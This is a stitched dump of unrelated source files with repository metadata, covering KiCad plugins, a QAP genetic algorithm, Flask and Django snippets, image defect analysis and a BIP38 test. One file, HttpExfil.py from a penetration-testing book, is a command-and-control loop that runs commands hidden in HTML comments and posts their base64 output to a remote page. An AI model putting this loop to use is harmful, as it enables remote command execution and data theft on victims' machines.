    return ','.join(x + ':' + SCOPE(x) for x in varlist)
def varsToAliasArr(varList):
    """Re-key a dict of variable objects by each value's `alias` attribute."""
    return {var.alias: var for var in varList.values()}
def createObjFromScope(varList):
    """Emit a JS object literal mapping each alias to its parsed $scope value."""
    return '{'+(','.join(v.alias+":"+PARSER(v.validType,SCOPE(v.alias)) for v in varList.values()))+'}'
def responseToScope(varList):
    """Emit JS statements copying response.data.data fields into $scope."""
    return ''.join(SCOPE(v.alias)+"=response.data.data."+v.alias+";" for v in varList.values())
def argsToScope(varList):
    """Emit JS statements assigning plain argument names into $scope."""
    return ''.join(SCOPE(v.alias)+"="+v.alias+";" for v in varList.values())
| [
"abhay199658@gmail.com"
] | abhay199658@gmail.com |
60c083d45755c5c8515e991f42f96dd819d6e4d5 | fbbbcfa050612a6242c095060bad774b60fc914d | /archive_project/old_version.py | 184a635253393fb5e1f993b883ce043eb4385aee | [] | no_license | MitjaNemec/Kicad_action_plugins | 79b4fa0fb8fdcb0aba3770f871f0c25bd982bea6 | f7f2eaa567a7354459e17f108427584fa6a6a8a4 | refs/heads/master | 2023-08-29T12:09:48.978854 | 2023-06-15T18:41:08 | 2023-06-15T18:41:08 | 110,839,994 | 406 | 79 | null | 2022-03-31T06:31:07 | 2017-11-15T13:55:47 | Python | UTF-8 | Python | false | false | 1,473 | py | # -*- coding: utf-8 -*-
# action_replicate_layout.py
#
# Copyright (C) 2018 Mitja Nemec
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import pcbnew
import wx
class OldVersion(pcbnew.ActionPlugin):
    """
    Notify user of missing wxpython
    """

    def defaults(self):
        # Plugin metadata shown in pcbnew's External Plugins menu.
        self.name = "Archive project"
        self.category = "Archive project"
        self.description = "Archive schematics symbols and 3D models"

    def Run(self):
        # Find the main pcbnew window to serve as the dialog's parent.
        _pcbnew_frame = [x for x in wx.GetTopLevelWindows() if x.GetTitle().lower().startswith('pcbnew')][0]
        caption = 'Archive project'
        message = "This plugin works with KiCad 5.1 and higher"
        dlg = wx.MessageDialog(_pcbnew_frame, message, caption, wx.OK | wx.ICON_INFORMATION)
        dlg.ShowModal()
        dlg.Destroy()
| [
"mitja.nemec@fe.uni-lj.si"
] | mitja.nemec@fe.uni-lj.si |
7ca71e74e605112ef507f107584f872545a68564 | 499efac953f9f0ed3ef1876b3a470250c75f7ac1 | /mnist_sklearn.py | 7f778519c5dc8279f17a25ce634530272f3881e0 | [] | no_license | ravi911sharma44/MNIST- | b7ffe5c2b9492e7997590a618c8a483f72709e95 | 15fb747ce7e928f963d4bd61d28a5411e98878c8 | refs/heads/main | 2023-07-17T03:04:02.138426 | 2021-08-14T15:31:24 | 2021-08-14T15:31:24 | 396,047,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | import pandas as pd
# Load the MNIST training CSV ('label' column plus 784 pixel columns).
# NOTE(review): absolute Windows path -- consider a CLI argument or relative path.
df = pd.read_csv (r'E:\chat bot intern\week 3\mnist_train.csv\mnist_train.csv')
df = pd.DataFrame(df)  # NOTE(review): redundant, read_csv already returns a DataFrame
from sklearn.model_selection import train_test_split
X = df.drop('label', axis = 1)
Y = df.label
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size = 0.2)
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
model = LinearRegression()
model.fit(x_train, y_train)
pred = model.predict(x_test)
# NOTE(review): MNIST labels are categorical; linear regression + MSE treats
# them as ordinal values -- a classifier with accuracy would be more appropriate.
print(mean_squared_error(y_test, pred))
"noreply@github.com"
] | ravi911sharma44.noreply@github.com |
bb53fe452117f99a8d8f7b1e33f47e1ab79db0c2 | 77b16dcd465b497c22cf3c096fa5c7d887d9b0c2 | /Cron_Philip/Assignments/flaskolympics/olympics3/server.py | 3c8cc483f0488a3e80700542e08036210ca2f614 | [
"MIT"
] | permissive | curest0x1021/Python-Django-Web | a7cf8a45e0b924ce23791c18f6a6fb3732c36322 | 6264bc4c90ef1432ba0902c76b567cf3caaae221 | refs/heads/master | 2020-04-26T17:14:20.277967 | 2016-10-18T21:54:39 | 2016-10-18T21:54:39 | 173,706,702 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | from flask import Flask, render_template, session
app = Flask(__name__)
# Required for session support.
# NOTE(review): hard-coded secret key -- load from the environment in production.
app.secret_key = 'ThisIsSecret'

@app.route('/')
def myfirstfunction():
    """Render the index page, seeding a default session title on first visit."""
    if not 'title' in session:
        session['title'] = 'hello world'
    return render_template('index.html', name="Mike")

if __name__ == '__main__':
    app.run(debug = True)
| [
"43941751+curest0x1021@users.noreply.github.com"
] | 43941751+curest0x1021@users.noreply.github.com |
b5ebdfe3b10eec2fa3575652a3e0276ef6f4b913 | 332e04cf48647c120161f3765fe3285a38fc44db | /qap_lab/source/solver.py | 4737c3303eae5ae21be6d978a9335d1cd4ed70c3 | [] | no_license | Venopacman/comb_opt_lessons | 7783d2eab3d037c566f84442fb1b8d4af00ad864 | 687aa6d5eab6424f1e310e0ac1230ca11670cc82 | refs/heads/master | 2020-03-29T12:41:39.226108 | 2018-11-25T21:17:15 | 2018-11-25T21:17:15 | 149,912,955 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,695 | py | import itertools
import os
import random
from copy import deepcopy
from typing import List
import numpy as np
import tqdm
from qap_lab.source.data_utils import Problem
from tqdm import trange
import json
import os
from multiprocessing import Pool
class Chromosome:
    """
    Permutation vector wrapper.

    ``genome[i]`` is the facility placed at location ``i``; ``fitness`` is
    the QAP objective value, computed once at construction.
    """

    def __init__(self, gene_list: List[int], _problem: "Problem"):
        self.genome = gene_list
        self.flow_matrix = _problem.flow_matrix
        self.dist_matrix = _problem.distance_matrix
        self.fitness = self.calc_fitness()
        # print(self.fitness)

    def calc_fitness(self) -> float:
        """Return sum over all location pairs of distance * flow."""
        n = len(self.genome)
        return sum(self.dist_matrix[i][j] * self.flow_matrix[self.genome[i]][self.genome[j]]
                   for i in range(n)
                   for j in range(n))

    def __eq__(self, other):
        # BUGFIX: chromosomes are collected into sets to enforce genome
        # uniqueness (initial population, reproduction), but the default
        # identity hash never deduplicates equal permutations. Equality and
        # hash are therefore value-based on the genome.
        if not isinstance(other, Chromosome):
            return NotImplemented
        return self.genome == other.genome

    def __hash__(self) -> int:
        return hash(tuple(self.genome))

    def swap_mutation(self):
        """Not implemented yet (placeholder kept for API compatibility)."""
        pass

    def scrumble_mutation(self):
        """Not implemented yet (placeholder kept for API compatibility)."""
        pass

    def persist(self, dir, problem_name):
        """Write the permutation (1-based) to ``dir/problem_name``."""
        with open(os.path.join(dir, problem_name), 'w') as f:
            f.write(" ".join(str(it + 1) for it in self.genome))
class Population:
    """A collection of chromosomes plus precomputed roulette-wheel weights."""

    def __init__(self, _chromosome_list: "List[Chromosome]", _problem: "Problem"):
        self.chromosome_list = _chromosome_list
        self.problem = _problem
        # Selection probabilities are fixed for the lifetime of this population.
        self.rolling_wheel_prob = self.calc_rolling_wheel_prob()

    def breeding(self) -> None:
        """
        Population evolving process
        """
        pass

    def get_best_chromosome(self) -> "Chromosome":
        """Return the chromosome with the smallest (best) fitness."""
        best = min(self.chromosome_list, key=lambda chrom: chrom.fitness)
        return best

    def calc_rolling_wheel_prob(self):
        """Inverse-fitness selection weights, normalised to sum to 1.

        Lower fitness (better solution for this minimisation task) receives
        a proportionally larger selection probability.
        """
        inverse_fitness = [1 / chrom.fitness for chrom in self.chromosome_list]
        total = sum(inverse_fitness)
        return [weight / total for weight in inverse_fitness]

    def select_n_chromosomes(self, n: int) -> "List[Chromosome]":
        """Draw ``n`` chromosomes (with replacement) by roulette wheel."""
        chosen = np.random.choice(len(self.chromosome_list), n, p=self.rolling_wheel_prob)
        return [self.chromosome_list[idx] for idx in chosen]
class GeneticAlgorithmSolver:
    def __init__(self, _problem: Problem):
        """GA hyper-parameters: population of 100; selection keeps ~30%."""
        self.problem = _problem
        self.population_size = 100
        self.selection_size = int(self.population_size * 0.3)
        self.population = self.generate_initial_population()
    def generate_initial_population(self) -> Population:
        """Fill the initial population with random permutations of 0..n-1.

        NOTE(review): uniqueness relies on Chromosome's hash/equality
        semantics; with a default identity hash the set never deduplicates
        equal genomes -- confirm intent.
        """
        _chromo_list = set()
        genome = list(range(self.problem.problem_size))
        while len(_chromo_list) != self.population_size:
            # for _ in range(self.population_size):
            _chromo_list.add(Chromosome(deepcopy(genome), self.problem))
            random.shuffle(genome)
        return Population(list(_chromo_list), self.problem)
def selection(self, population: Population) -> List[Chromosome]:
"""
Rolling wheel selection
:param population:
:return:
"""
return population.select_n_chromosomes(self.selection_size)
def ordered_crossover(self, chrom_1: Chromosome, chrom_2: Chromosome) -> Chromosome:
_ub = len(chrom_1.genome) - 1
start_index = np.random.randint(0, _ub)
end_index = start_index + np.random.randint(1, _ub - start_index + 1)
alpha_genome = chrom_1.genome[start_index:end_index]
beta_genome = [gen for gen in chrom_2.genome if gen not in alpha_genome]
resulted_genome = beta_genome[:start_index] + alpha_genome + beta_genome[start_index:]
return Chromosome(resulted_genome, self.problem)
def reproduction(self, parents: List[Chromosome], n: int) -> List[Chromosome]:
pairs_universe: List[(Chromosome, Chromosome)] = [(ch_1, ch_2) for ch_1 in parents for ch_2 in parents
if ch_1 != ch_2]
# pair_sample = [pairs_universe[i] for i in
# ]
child_list = set()
# for parent_1, parent_2 in pair_sample:
while len(child_list) != n:
parent_1, parent_2 = pairs_universe[
np.random.choice(len(pairs_universe), n, p=[1 / len(pairs_universe)] * len(pairs_universe))[0]]
child_list.add(self.ordered_crossover(parent_1, parent_2))
return list(child_list)
def solve(self) -> Chromosome:
current_best: Chromosome = self.population.get_best_chromosome()
# t = trange(100, desc='Solving')
for _ in range(25000):
# avg_fitness = np.average([it.fitness for it in self.population.chromosome_list])
# t.set_description('Solving (avg fitness=%g)' % avg_fitness)
parents = self.selection(self.population)
childes = self.reproduction(parents, self.population_size - self.selection_size)
self.population = self.mutation(childes, parents)
cand_best: Chromosome = self.population.get_best_chromosome()
if cand_best.fitness < current_best.fitness:
current_best = cand_best
# print('Best update: {0}'.format(current_best.fitness))
return current_best
def mutation(self, _childes: List[Chromosome], _parents: List[Chromosome]):
def _mutate(_chromosome: Chromosome) -> Chromosome:
def _swap(_chromosome, a_ind, b_ind) -> Chromosome:
_genome = _chromosome.genome
_genome[a_ind], _genome[b_ind] = _genome[b_ind], _genome[a_ind]
return Chromosome(_genome, self.problem)
def _scramble(_chromosome, a_ind, b_ind) -> Chromosome:
_genome = _chromosome.genome
_buff = deepcopy(_genome[a_ind:b_ind])
random.shuffle(_buff)
_genome[a_ind:b_ind] = _buff
return Chromosome(_genome, self.problem)
_ub = len(_chromosome.genome) - 1
start_index = np.random.randint(0, _ub)
end_index = start_index + np.random.randint(1, _ub - start_index + 1)
if random.uniform(0, 1) > 0.5:
return _swap(_chromosome, start_index, end_index)
else:
return _scramble(_chromosome, start_index, end_index)
unmutated_population = _childes + _parents
threshold = random.uniform(1 / self.population_size, 1 / self.problem.problem_size)
resulted_population = []
for chromosome in unmutated_population:
if random.uniform(0, 1) > threshold:
resulted_population.append(chromosome)
else:
resulted_population.append(_mutate(chromosome))
return Population(resulted_population, self.problem)
def main(path):
    """Solve one problem instance file and persist the solution next to it if
    it beats (or initialises) the recorded best in ../data/best_results.json."""
    problem_name = path.split("/")[-1].split(".")[0]
    tai_problem = Problem(path)
    genetic_solver = GeneticAlgorithmSolver(tai_problem)
    solution = genetic_solver.solve()
    result_dict = json.load(open("../data/best_results.json"))
    # A stored value of 0 means "no result recorded yet" for this problem.
    if result_dict[problem_name] > solution.fitness or result_dict[problem_name] == 0:
        solution.persist(os.path.dirname(path), problem_name + ".sol")
        print("Improvement in {0} problem!".format(problem_name))
        result_dict[problem_name] = int(solution.fitness)
    print("Problem {0} finished!".format(problem_name))
    # NOTE(review): when run under the worker Pool below, several processes
    # read-modify-write this JSON concurrently; last writer wins — confirm
    # this race is acceptable.
    json.dump(result_dict, open("../data/best_results.json", 'w'), indent=2)
if __name__ == "__main__":
    root_dir = '../data'
    # Every problem file (anything that is not a .json or .sol artifact),
    # repeated 10 times so each instance gets several independent runs.
    problem_path_list = [os.path.join(root_dir, it) for it in os.listdir(root_dir) if
                         not (it.endswith(".json") or it.endswith(".sol"))] * 10
    with Pool(processes=4) as pool:
        for res in pool.imap_unordered(main, problem_path_list):
            pass
| [
"pdsmirnov@yandex.ru"
] | pdsmirnov@yandex.ru |
550abb7570d8b8943d140a815dfcc92c727bbc0b | fbb1494be3ff7b6a5dfa3b9204cc927af4103b59 | /api/urls.py | 242b792a393d67ac9d39ff798fc079072c76b9ff | [] | no_license | james-work-account/raml_loader_api | a3380faf6f07ae82b1b113e7019fbb5f6840df31 | 4483b13de5d74c20f7c3696ba6180332b36fdc2b | refs/heads/master | 2021-07-24T07:32:28.507993 | 2020-10-06T08:38:23 | 2020-10-06T08:38:23 | 222,752,033 | 0 | 0 | null | 2020-10-06T08:25:55 | 2019-11-19T17:29:11 | Python | UTF-8 | Python | false | false | 802 | py | """api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
# URL routing table: RAML parser endpoints under /raml/, admin site under /admin/.
urlpatterns = [
    path('raml/', include('raml_parser.urls')),
    path('admin/', admin.site.urls),
]
| [
"31282758+james-work-account@users.noreply.github.com"
] | 31282758+james-work-account@users.noreply.github.com |
34d788e9ab997f619139b8af4b45a786cee0aac0 | ce27a376fa4f6a25008674d007c670a4a0b8bda7 | /defects_thresholding.py | 1c96261ba4ebe8222fcc90b839c16ced1c0d9cfa | [] | no_license | jrr1984/defects_analysis | 22139b7734478b6261cf9efeaae755a2c5c71c79 | 2e43b65f1b936516f4a4c8f7feb5d46468864957 | refs/heads/master | 2020-12-10T20:00:39.977833 | 2020-04-16T12:00:22 | 2020-04-16T12:00:22 | 233,694,615 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,701 | py | from skimage.filters import threshold_yen,threshold_isodata
from skimage import io,measure,img_as_float,morphology
from skimage.measure import regionprops_table
from skimage.color import label2rgb
import numpy as np
from scipy import ndimage
import matplotlib.pyplot as plt
from matplotlib_scalebar.scalebar import ScaleBar
import pandas as pd
import glob
import time
# Batch pipeline: segment dark defects (and holes inside them) in every NIR
# tile, measure diameters/areas in microns, estimate per-region measurement
# error by re-running with a 10%-lower threshold, and pickle the results.
start_time = time.time()
pixels_to_microns = 0.586
proplist = ['equivalent_diameter','area']
path = "C:/Users/juanr/Documents/mediciones_ZEISS/TILING/NIR/norm/*.tif"
data= []
holes_data = []
i=0
for file in glob.glob(path):
    img = io.imread(file)
    img = img_as_float(img)
    # Yen auto-threshold segments dark defects; the "_var" variant uses a 10%
    # lower threshold so the difference gives an error estimate per region.
    thresh = threshold_yen(img)
    binary = img <= thresh
    binary_var = img <= (thresh - 0.1*thresh)
    masked_binary = ndimage.binary_fill_holes(binary)
    masked_binary_var = ndimage.binary_fill_holes(binary_var)
    # Holes = filled mask minus raw mask: bright regions enclosed by defects.
    hols = masked_binary.astype(int) - binary
    hols_var = masked_binary_var.astype(int) - binary_var
    lab = measure.label(hols,connectivity=2)
    lab_var = measure.label(hols_var, connectivity=2)
    cleaned_holes = morphology.remove_small_objects(lab, connectivity=2)
    cleaned_holes_var = morphology.remove_small_objects(lab_var, connectivity=2)
    label_image = measure.label(masked_binary,connectivity=2)
    label_image_var = measure.label(masked_binary_var, connectivity=2)
    # Discard defects smaller than 15 px before measuring.
    label_final = morphology.remove_small_objects(label_image, min_size=15)
    label_final_var = morphology.remove_small_objects(label_image_var, min_size=15)
    if label_final.any()!=0 and label_final_var.any() !=0:
        props = regionprops_table(label_final, intensity_image=img, properties=proplist)
        props_var = regionprops_table(label_final_var, intensity_image=img, properties=proplist)
        props_df = pd.DataFrame(props)
        props_df_var = pd.DataFrame(props_var)
        # NOTE(review): the subtraction aligns rows by DataFrame index, which
        # assumes both thresholds yield the same regions in the same order —
        # confirm; a region split/merge between variants would misalign rows.
        props_df['error_diameter'] = abs(round((props_df['equivalent_diameter'] - props_df_var['equivalent_diameter'])*pixels_to_microns))
        props_df['error_area'] = abs(round((props_df['area'] - props_df_var['area']) * pixels_to_microns ** 2))
        props_df['img'] = i
        data.append(props_df)
        print('defects_df')
        print(props_df)
        print('error')
        print(props_df['error_diameter'])
    if cleaned_holes.any()!= 0 and cleaned_holes_var.any() != 0:
        props_holes = regionprops_table(cleaned_holes, intensity_image=img, properties=proplist)
        props_holes_var = regionprops_table(cleaned_holes_var, intensity_image=img, properties=proplist)
        holes_df = pd.DataFrame(props_holes)
        holes_df_var = pd.DataFrame(props_holes_var)
        holes_df['error_diameter'] = abs(round((holes_df['equivalent_diameter'] - holes_df_var['equivalent_diameter'])*pixels_to_microns))
        holes_df['error_area'] = abs(round((holes_df['area'] - holes_df_var['area']) * pixels_to_microns**2))
        holes_df['img'] = i
        holes_data.append(holes_df)
        print('holes_df')
        print(holes_df)
        print('error holes')
        print(holes_df['error_diameter'])
    print(file, i)
    i += 1
# Convert pixel measurements to microns and persist.
# NOTE(review): pd.concat raises on an empty list — this assumes at least one
# image produced defects and at least one produced holes.
df = pd.concat(data)
df['equivalent_diameter'] = round(df['equivalent_diameter'] * pixels_to_microns)
df['area'] = round(df['area'] * pixels_to_microns **2)
df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsNIR_df.pkl")
holes_df = pd.concat(holes_data)
holes_df['equivalent_diameter'] = round(holes_df['equivalent_diameter'] * pixels_to_microns)
holes_df['area'] = round(holes_df['area'] * pixels_to_microns **2)
holes_df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsholesNIR_df.pkl")
print("--- %s minutes ---" % ((time.time() - start_time)/60))
"juanreto@gmail.com"
] | juanreto@gmail.com |
420fab0c05381289bc6cac20833db699a61ff63b | b883802b374515f7bb453f9631a65bb63b5cd8cc | /filter.py | 6e03457e43b34ee541ab28f736a0550bd1d99d3e | [] | no_license | Harry-Yao/learn-about-python | 6898cae04f665400ab255989b9d8c1388cb94362 | 558085e0fdd7a4488303c91206b44b353e4b58e7 | refs/heads/master | 2021-01-10T17:44:29.301594 | 2016-03-10T16:09:50 | 2016-03-10T16:09:50 | 52,965,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | # -*- coding: utf-8 -*-
def is_palindrome(n):
    """Return str(n) when n reads the same forwards and backwards, else None.

    The string/None return makes this usable directly as a filter() predicate.
    """
    text = str(n)
    return text if text == text[::-1] else None
# Test: keep only the numbers in [1, 1000) that read the same both ways.
output = filter(is_palindrome, range(1, 1000))
print(list(output))
"673441990@qq.com"
] | 673441990@qq.com |
a722c34d1eb09a9e71cc919a6734cf38c3fe7d9a | bcc1f398423b7107dc54b3046fa49029b416fba2 | /Module 3/Chapter 8/HttpExfil.py | 9b8d7d24874df32cc0cf0c653201baaea33956cf | [
"MIT",
"Apache-2.0"
] | permissive | PacktPublishing/Python-Penetration-Testing-for-Developers | d81432bd276366fb606e0d2231956c2770b2952c | a712d19c9587d04e13b332adbc3620c0df477c89 | refs/heads/master | 2023-02-18T20:10:37.725636 | 2023-01-30T08:36:57 | 2023-01-30T08:36:57 | 68,084,109 | 43 | 37 | null | null | null | null | WINDOWS-1250 | Python | false | false | 521 | py | import requests
import re
import subprocess
import time
import os
# NOTE(review): command-and-control polling loop from a penetration-testing
# textbook exercise (polls HTML comments for commands, posts base64 output to
# a guestbook endpoint). It is left non-functional as published: `if comment
# = " "` is a syntax error (assignment vs ==), os.delete() does not exist
# (os.remove is the real API), and the "command fail" literal uses smart
# quotes. Deliberately NOT repaired here; lab/demo use only.
while 1:
    req = requests.get("http://127.0.0.1")
    comments = re.findall('<!--(.*)-->',req.text)
    for comment in comments:
        if comment = " ":
            os.delete(__file__)
        else:
            try:
                response = subprocess.check_output(comment.split())
            except:
                response = “command fail”
    data={"comment":(''.join(response)).encode("base64")}
    newreq = requests.post("http://127.0.0.1notmalicious.com/xss/easy/addguestbookc2.php ", data=data)
    time.sleep(30)
| [
"jayeshs@packtpub.net"
] | jayeshs@packtpub.net |
ad3c6e6becb9b5646766ed2063c8d949313bda56 | aee573c81dc297a97772b99cd90e05d494b25f77 | /learnpython/matplotlib/demo_plot_2.py | e5879a3c9928961f2b12810475ab9a793f96f56e | [] | no_license | YuxuanSu-Sean/learning | 6df9d7b348e3f6c8cad0347e222c1ed244c92332 | 1356b85c2b673925f1fc89ff45f54fb499d342d0 | refs/heads/master | 2022-11-13T14:08:17.808037 | 2022-11-10T05:15:16 | 2022-11-10T05:15:16 | 204,625,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | import matplotlib.pyplot as plt
# Create an empty figure and attach a single Axes (1-row, 1-column grid, cell 1).
fig = plt.figure()
ax1 = fig.add_subplot(111)
| [
"497572121@qq.com"
] | 497572121@qq.com |
a2db15dc70256c5ac16e2d712ccd8393faf996ac | c820e028be4239bc20e76af41574e561ba8d8e02 | /gsw/version.py | 2f5fd65dfc4d9ab9ae7c7b3df560f34efabacd78 | [
"MIT"
] | permissive | lukecampbell/python-gsw | 7657c2e3a0dbadad00ff17557f4ca45f971f3964 | c555921b5f1fcbc1c1a3565172b946f782d15db4 | refs/heads/master | 2016-09-06T16:54:47.074484 | 2013-02-20T20:00:03 | 2013-02-20T20:00:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43 | py | #!/usr/bin/env python
# Single source of the package version (PEP 440 pre-release: 3.0.1 alpha 1).
version = '3.0.1a1'
| [
"luke.s.campbell@gmail.com"
] | luke.s.campbell@gmail.com |
b301691a347e993eeb0904ec4da555a684042612 | caf39133030e9e9d9240769fbfe72287009c6b51 | /math/0x02-calculus/17-integrate.py | 70e1a9c8db0993bc659e0d727a1f9eab6e7a5be6 | [] | no_license | sazad44/holbertonschool-machine_learning | d08facbc24582ebcedf9a8607c82b18909fe7867 | b92e89b980a8f1360a24f4ed5654a2ab0dfac679 | refs/heads/master | 2022-11-30T22:32:21.264942 | 2020-08-12T05:25:06 | 2020-08-12T05:25:06 | 280,286,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 728 | py | #!/usr/bin/env python3
"""task 17 py function to integrate a polynomial"""
def poly_integral(poly, C=0):
    """py function to calculate integral of poly

    Args:
        poly: list of numeric coefficients; poly[i] multiplies x^i.
        C: integer constant of integration (becomes the new constant term).

    Returns:
        Coefficient list of the integral (constant term first). Coefficients
        with integral values are stored as ints, trailing zero terms are
        stripped, and [0] is returned for the zero polynomial with C == 0.
        Returns None for invalid input.
    """
    if not isinstance(poly, list) or len(poly) == 0 or not isinstance(C, int):
        return None
    # Reject non-numeric coefficients up front instead of raising mid-way.
    if not all(isinstance(coef, (int, float)) for coef in poly):
        return None
    new_poly = [C]
    for power, coef in enumerate(poly):
        value = coef / (power + 1)
        # Store exact integers as int (e.g. 4/2 -> 2, not 2.0).
        new_poly.append(int(value) if float(value).is_integer() else value)
    # Drop trailing zero terms but always keep the constant term.
    # (The original returned [0] whenever the coefficients summed to zero,
    # which wrongly collapsed polynomials such as [1, -2] -> [0, 1, -1].)
    while len(new_poly) > 1 and new_poly[-1] == 0:
        new_poly.pop()
    return new_poly
| [
"36613205+sazad44@users.noreply.github.com"
] | 36613205+sazad44@users.noreply.github.com |
998e74d73408d3c5bf3bf99ce5df17a7a52ee3f8 | 0a40a0d63c8fce17f4a686e69073a4b18657b160 | /test/functional/rpc_bip38.py | b70349a25ed83fb3fc00d631b1bc8dcd9eb3f3e4 | [
"MIT"
] | permissive | MotoAcidic/Cerebellum | 23f1b8bd4f2170c1ed930eafb3f2dfff07df1c24 | 6aec42007c5b59069048b27db5a8ea1a31ae4085 | refs/heads/main | 2023-05-13T06:31:23.481786 | 2021-06-09T15:28:28 | 2021-06-09T15:28:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,025 | py | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The CEREBELLUM developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for BIP38 encrypting and decrypting addresses."""
from test_framework.test_framework import CerebellumTestFramework
from test_framework.util import assert_equal
class Bip38Test(CerebellumTestFramework):
    """Round-trip test: a wallet address BIP38-encrypted on one node can be
    decrypted back to the same address on another node."""
    def set_test_params(self):
        # Two fresh nodes on a clean chain: node 0 encrypts, node 1 decrypts.
        self.setup_clean_chain = True
        self.num_nodes = 2
    def run_test(self):
        password = 'test'
        address = self.nodes[0].getnewaddress()
        # NOTE(review): privkey is never used afterwards — dumpprivkey only
        # exercises the wallet here; confirm whether comparing it was intended.
        privkey = self.nodes[0].dumpprivkey(address)
        self.log.info('encrypt address %s' % (address))
        bip38key = self.nodes[0].bip38encrypt(address, password)['Encrypted Key']
        self.log.info('decrypt bip38 key %s' % (bip38key))
        # Decrypting on a different node must recover the original address.
        assert_equal(self.nodes[1].bip38decrypt(bip38key, password)['Address'], address)
# Standard functional-test entry point.
if __name__ == '__main__':
    Bip38Test().main()
| [
"travisfinch01@gmail.com"
] | travisfinch01@gmail.com |
2bcd1788de6e9a593abedae6ed61b48c43c67654 | 06d6c9346331e392f6d8067eb9ee52d38ae5fab8 | /carver/pe/setup.py | 299b8bff264703b5031d4a1ddd6b11e7c4e69e92 | [
"Apache-2.0"
] | permissive | maydewd/stoq-plugins-public | 5d5e824dda0c78acab4ff9aef72f567e6b85e555 | 8b2877b5091ae731437ef35a95d4debdbf0a19f3 | refs/heads/master | 2020-03-22T18:57:41.061748 | 2018-06-12T14:36:42 | 2018-06-12T14:36:42 | 140,494,475 | 0 | 0 | Apache-2.0 | 2018-07-10T22:39:08 | 2018-07-10T22:39:08 | null | UTF-8 | Python | false | false | 371 | py | from setuptools import setup, find_packages
# Distribution metadata for the "pe" carver plugin (carves portable
# executables out of arbitrary data streams for the stoQ framework).
setup(
    name="pe",
    version="0.10",
    author="Jeff Ito, Marcus LaFerrera (@mlaferrera)",
    url="https://github.com/PUNCH-Cyber/stoq-plugins-public",
    license="Apache License 2.0",
    description="Carve portable executable files from a data stream",
    packages=find_packages(),
    include_package_data=True,
)
| [
"marcus@randomhack.org"
] | marcus@randomhack.org |
f6feb1566f4a0b2b2e1860b1005500bb45004b68 | 79429bd1c124044572bef9d1062d145c01e20b24 | /ex026.py | d7d2e948a9f0c2b06d59b7d78ecec3325b3eb7ee | [] | no_license | xxweell/exerciciosPython | b6fe00d67a39391bb8794953832f07f7f75eb504 | 93c1ac25dc1d1875c4102e1126fa54a537bb0973 | refs/heads/master | 2022-11-14T20:30:13.587004 | 2020-06-17T21:06:59 | 2020-06-17T21:06:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | frase = str(input('Digite uma frase: ')).strip().upper()
# Count occurrences of the letter A (the input was upper-cased above).
print('A letra A aparece {} vezes na frase.'.format(frase.count('A')))
# find() returns the 0-based index of the first occurrence, hence the +1.
print('A primeira letra A apareceu na posição {}.'.format(frase.find('A')+1))
# rfind() returns the index of the last occurrence.
print('A última letra A apareceu na posição {}.'.format(frase.rfind('A')+1))
| [
"wellingtoncw7@gmail.com"
] | wellingtoncw7@gmail.com |
dc23bbd95004a5f6fa4e5a6ef31d8b013040ba34 | 6874015cb6043d1803b61f8978627ddce64963b4 | /django/db/backends/postgresql/operations.py | 0edcf42febaa364b316750501cb20183caacea8e | [
"BSD-3-Clause",
"Python-2.0"
] | permissive | yephper/django | 25fbfb4147211d08ec87c41e08a695ac016454c6 | cdd1689fb354886362487107156978ae84e71453 | refs/heads/master | 2021-01-21T12:59:14.443153 | 2016-04-27T09:51:41 | 2016-04-27T09:51:41 | 56,134,291 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,101 | py | from __future__ import unicode_literals
from psycopg2.extras import Inet
from django.conf import settings
from django.db.backends.base.operations import BaseDatabaseOperations
class DatabaseOperations(BaseDatabaseOperations):
    """PostgreSQL-specific SQL generation, identifier quoting and Python-value
    adaptation for the psycopg2 backend."""
    def unification_cast_sql(self, output_field):
        internal_type = output_field.get_internal_type()
        if internal_type in ("GenericIPAddressField", "IPAddressField", "TimeField", "UUIDField"):
            # PostgreSQL will resolve a union as type 'text' if input types are
            # 'unknown'.
            # http://www.postgresql.org/docs/9.4/static/typeconv-union-case.html
            # These fields cannot be implicitly cast back in the default
            # PostgreSQL configuration so we need to explicitly cast them.
            # We must also remove components of the type within brackets:
            # varchar(255) -> varchar.
            return 'CAST(%%s AS %s)' % output_field.db_type(self.connection).split('(')[0]
        return '%s'
    def date_extract_sql(self, lookup_type, field_name):
        # http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
        if lookup_type == 'week_day':
            # For consistency across backends, we return Sunday=1, Saturday=7.
            return "EXTRACT('dow' FROM %s) + 1" % field_name
